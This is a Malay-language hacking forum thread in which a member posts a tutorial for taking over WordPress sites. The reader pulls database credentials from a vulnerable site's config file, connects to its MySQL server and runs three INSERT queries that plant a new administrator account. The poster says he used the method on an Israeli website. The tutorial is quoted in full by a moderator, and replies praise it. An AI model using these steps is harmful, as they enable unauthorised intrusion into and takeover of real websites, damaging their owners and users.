Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!

Show-Off Tutorial Add Admin User To The WordPress Database Via MySQL (Linux)

mangtx

Second Lieutenant
DFM Hackers
Joined
Jun 4, 2021
Messages
471
Reaction score
2,305
DragonCoin
415
Ancient Dragon
Frost Dragon
Fire Red Dragon
Black Dragon
Shark
Hi. Lama tak bersua. Ok guys, harini aku nk bagi tutor macam mna nak add Admin di dalam sesebuah website yang menggunakan CMS WordPress. Sebelum ni, bro @lu21n ada buat thread yang sama untk Add Admin tapi tutorial tu tk dapat digunakan untk website yang menggunakan CMS WordPress. Tanpa membuang masa, jom kita start.

________________________________________________________________________________________________________________________
1. Cari website yang vuln & lepastu cari config.file wesbite tersebut. Pastikan website WordPress ya.

1638694400526.png

2. Kalau dalam config file tu host nya "localhost", kita kena scan IP website tersebut terlebih dahulu. IP website merupakan host kepada database mysql tersebut. Nak check ip just open cmd then type
Code:
ping namawebsite.com

1638694740035.png

3. Then korang start linux. Di sini aku pakai Kali Linux. Open terminal then type code di bawah.
Code:
mysql -u usernamedatabase -h host -p
Ni contoh:
1638695407214.png

Rujukan untuk show tables & select user boleh tngk thread bro @lu21n . Aku direct trus show tables & users. Di sini tables user adalah 28a_users.
1638695654075.png

4. Ada tiga Sql Query korang kena buat untuk add user & tukar role menjadi admin.
Code:
INSERT INTO `databasename`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('4', 'demo', MD5('demo'), 'Your Name', '[email protected]', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'Your Name');
 
 
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
 
 
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_user_level', '10');

4.a So untuk query pertama, korang copy dan paste kat terminal. TAPI jangan dulu hit enter ya. Korang kena ubah " `databasename`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) " yang ni terlebih dahulu.

Ni contoh gambar kat bawah:
1638696356669.png
Just follow macam yg kat collumn tu. User_status mesti 0 ya, yg lain boleh kosong tapi pastikan guna camni ' ' . databasename dgn wp_ users kna tukar. Di dlm gmbrt tu databasname website tu (xxxxxxxx_pis) dan wp_users (28a_users).Untuk user_pass, kena guna MD5 hash. Lepas dah check & confirmkan, hit enter. Ok first step dah berjaya add user korang. Untuk check dah berjaya add, just type
Code:
select * from wp_users;
1638696881421.png
Ok dah berjaya add user

5. Step seterusnya, user yang korang add tdi kna add lgi ke dalam tables wp_usermeta. Apa ni usermeta? Usermeta ni untuk edit roles user di dalam. So, korang boleh edit roles user yg korang add tdi dari user biasa menjadi admin.

Ok, copy sql query yang kedua tadi dan paste ke dalam terminal. INGAT, kena edit dlu baru korang hit enter
Code:
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');

Sebelum korang tukar apa2, korang kena check dulu (`umeta_id`, `user_id`, `meta_key`, `meta_value`) . Type code ni untuk check:
Code:
select * from wp_usermeta;

Disini wp_usermeta aku ialah 28a_usermeta, so aku just type select * from 28a_usermeta;

1638698536724.png

So, mcm ni bentuk (`umeta_id`, `user_id`, `meta_key`, `meta_value`) . user_id tu id_status user korang tadi. Tngk balik gambar no 4, id_status untuk mangtx ialah 4 so user_id ialah 4. umeta_id korang check number yang paling last. Contoh:

1638698773064.png

So, number umeta_id yang last ialah 837. So kita akan guna number yang belum ada iaitu 838. Then, korang kena add user tadi ke dalam usermeta. Untuk user aku tadi (mantx), aku dah add dengan guna code sql query yang kedua. Ni contoh:

1638699290539.png

Lepas dah, baru korang guna code ni
Code:
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');

Apa yang korang perlu tukar just wp_capabilities (28a_capabilities) = Macam dalam gambar. Then tukar user_id ikut user_id user korang (user_id mangtx tadi 4, so kekal 4). Then umeta_id tu tukar selepas umeta_id tadi ( Tadi aku dah add umeta_id 838, so sekarang aku guna 839). databasename & wp_usermeta tukar . Ni contoh aku dh tukar dan berjaya add:

1638700187055.png

6. Ok ini step last. Korang dah pening ke tu? Biasalah, nak jadi hacker kena lah hadap benda yang ssh (gelak jahat) Ok sambung, korang guna sql query yang ketiga
Code:
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_user_level', '10');

Step nya sama ja macam no 5 yang last tu, just tukar databasename, wp_usermeta, umeta_id (tadi 839 so skrg guna 840), user_id (user_id mangtx tdi 4 so guna 4), meta_key (untuk database website yang aku demo, website tu guna 28a_user_level so guna yg ni) dan meta_value jgn usik.

1638700836774.png

Disini aku aku buat mistake, so terpaksa guna umeta_id 841 bukan 840. So lepas dah edit semua, hit enter.

Dan user tadi akan yang korang add akan bertukar role dari user biasa kepada administrator. So korang dah boleh access admin panel website tersebut. Gambar di bawah ni salah satu website Israel yang aku add user menggunakan method ni.

1638701115657.png

Ps: Tak semua website WordPress boleh access DB MySql secara direct ya.

Itu saja untuk kali ni. Sekian terima kasih​
 
Last edited:

Braderlala

Warrant Officer I
DFM Member
Joined
Jun 6, 2021
Messages
82
Reaction score
1,655
DragonCoin
5,419
tq sharing :love:

NO SYSTEM IS SECURE
"tryhackme.com/p/Braderlala"
Braderlala.png
 

Aiman

Forum Etiquette & Moderation
DFM Sub Moderator
Joined
May 30, 2021
Messages
4,465
Reaction score
17,930
DragonCoin
54,414
Dragon Nest (드래곤네스트)
Black Dragon
Fire Red Dragon
Rawr The Fat Tiger
Hi. Lama tak bersua. Ok guys, harini aku nk bagi tutor macam mna nak add Admin di dalam sesebuah website yang menggunakan CMS WordPress. Sebelum ni, bro @lu21n ada buat thread yang sama untk Add Admin tapi tutorial tu tk dapat digunakan untk website yang menggunakan CMS WordPress. Tanpa membuang masa, jom kita start.

________________________________________________________________________________________________________________________
1. Cari website yang vuln & lepastu cari config.file wesbite tersebut. Pastikan website WordPress ya.

View attachment 16075

2. Kalau dalam config file tu host nya "localhost", kita kena scan IP website tersebut terlebih dahulu. IP website merupakan host kepada database mysql tersebut. Nak check ip just open cmd then type
Code:
ping namawebsite.com

View attachment 16076

3. Then korang start linux. Di sini aku pakai Kali Linux. Open terminal then type code di bawah.
Code:
mysql -u usernamedatabase -h host -p
Ni contoh:
View attachment 16079

Rujukan untuk show tables & select user boleh tngk thread bro @lu21n . Aku direct trus show tables & users. Di sini tables user adalah 28a_users.
View attachment 16080

4. Ada tiga Sql Query korang kena buat untuk add user & tukar role menjadi admin.
Code:
INSERT INTO `databasename`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('4', 'demo', MD5('demo'), 'Your Name', '[email protected]', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'Your Name');
 
 
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
 
 
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_user_level', '10');

4.a So untuk query pertama, korang copy dan paste kat terminal. TAPI jangan dulu hit enter ya. Korang kena ubah " `databasename`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) " yang ni terlebih dahulu.

Ni contoh gambar kat bawah:
View attachment 16081
Just follow macam yg kat collumn tu. User_status mesti 0 ya, yg lain boleh kosong tapi pastikan guna camni ' ' . databasename dgn wp_ users kna tukar. Di dlm gmbrt tu databasname website tu (xxxxxxxx_pis) dan wp_users (28a_users).Untuk user_pass, kena guna MD5 hash. Lepas dah check & confirmkan, hit enter. Ok first step dah berjaya add user korang. Untuk check dah berjaya add, just type
Code:
select * from wp_users;
View attachment 16082
Ok dah berjaya add user

5. Step seterusnya, user yang korang add tdi kna add lgi ke dalam tables wp_usermeta. Apa ni usermeta? Usermeta ni untuk edit roles user di dalam. So, korang boleh edit roles user yg korang add tdi dari user biasa menjadi admin.

Ok, copy sql query yang kedua tadi dan paste ke dalam terminal. INGAT, kena edit dlu baru korang hit enter
Code:
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');

Sebelum korang tukar apa2, korang kena check dulu (`umeta_id`, `user_id`, `meta_key`, `meta_value`) . Type code ni untuk check:
Code:
select * from wp_usermeta;

Disini wp_usermeta aku ialah 28a_usermeta, so aku just type select * from 28a_usermeta;

View attachment 16083

So, mcm ni bentuk (`umeta_id`, `user_id`, `meta_key`, `meta_value`) . user_id tu id_status user korang tadi. Tngk balik gambar no 4, id_status untuk mangtx ialah 4 so user_id ialah 4. umeta_id korang check number yang paling last. Contoh:

View attachment 16084

So, number umeta_id yang last ialah 837. So kita akan guna number yang belum ada iaitu 838. Then, korang kena add user tadi ke dalam usermeta. Untuk user aku tadi (mantx), aku dah add dengan guna code sql query yang kedua. Ni contoh:

View attachment 16085

Lepas dah, baru korang guna code ni
Code:
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');

Apa yang korang perlu tukar just wp_capabilities (28a_capabilities) = Macam dalam gambar. Then tukar user_id ikut user_id user korang (user_id mangtx tadi 4, so kekal 4). Then umeta_id tu tukar selepas umeta_id tadi ( Tadi aku dah add umeta_id 838, so sekarang aku guna 839). databasename & wp_usermeta tukar . Ni contoh aku dh tukar dan berjaya add:

View attachment 16086

6. Ok ini step last. Korang dah pening ke tu? Biasalah, nak jadi hacker kena lah hadap benda yang ssh (gelak jahat) Ok sambung, korang guna sql query yang ketiga
Code:
INSERT INTO `databasename`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '4', 'wp_user_level', '10');

Step nya sama ja macam no 5 yang last tu, just tukar databasename, wp_usermeta, umeta_id (tadi 839 so skrg guna 840), user_id (user_id mangtx tdi 4 so guna 4), meta_key (untuk database website yang aku demo, website tu guna 28a_user_level so guna yg ni) dan meta_value jgn usik.

View attachment 16087

Disini aku aku buat mistake, so terpaksa guna umeta_id 841 bukan 840. So lepas dah edit semua, hit enter.

Dan user tadi akan yang korang add akan bertukar role dari user biasa kepada administrator. So korang dah boleh access admin panel website tersebut. Gambar di bawah ni salah satu website Israel yang aku add user menggunakan method ni.

View attachment 16088

Ps: Tak semua website WordPress boleh access DB MySql secara direct ya.

Itu saja untuk kali ni. Sekian terima kasih​
Mantap man....bookmark dulu .. tq sharing .. :)
 

mangtx

Second Lieutenant
DFM Hackers
Joined
Jun 4, 2021
Messages
471
Reaction score
2,305
DragonCoin
415
Ancient Dragon
Frost Dragon
Fire Red Dragon
Black Dragon
Shark
Penerangan yang bagus dan lengkap (y)
Tq min 👍🏻
Wow mantap perkongsian idola 🤠
Uish uncle lh idola para hejes² 😆
tq sharing :love:

NO SYSTEM IS SECURE
"tryhackme.com/p/Braderlala"
Braderlala.png
Mantap 👍🏻
Padula,,,thanks for sharing 🤩
Tkda lh padu, biass² ja 👍🏻
Mmg penggodam wordpress sejati 🤣 terbaik man 👍
WordPress bnyk jnis vuln, sng nk exploit 🤣
Mantap man....bookmark dulu .. tq sharing .. :)
Mantap 👍🏻😎
Uish tkde lh 🤭
 
Top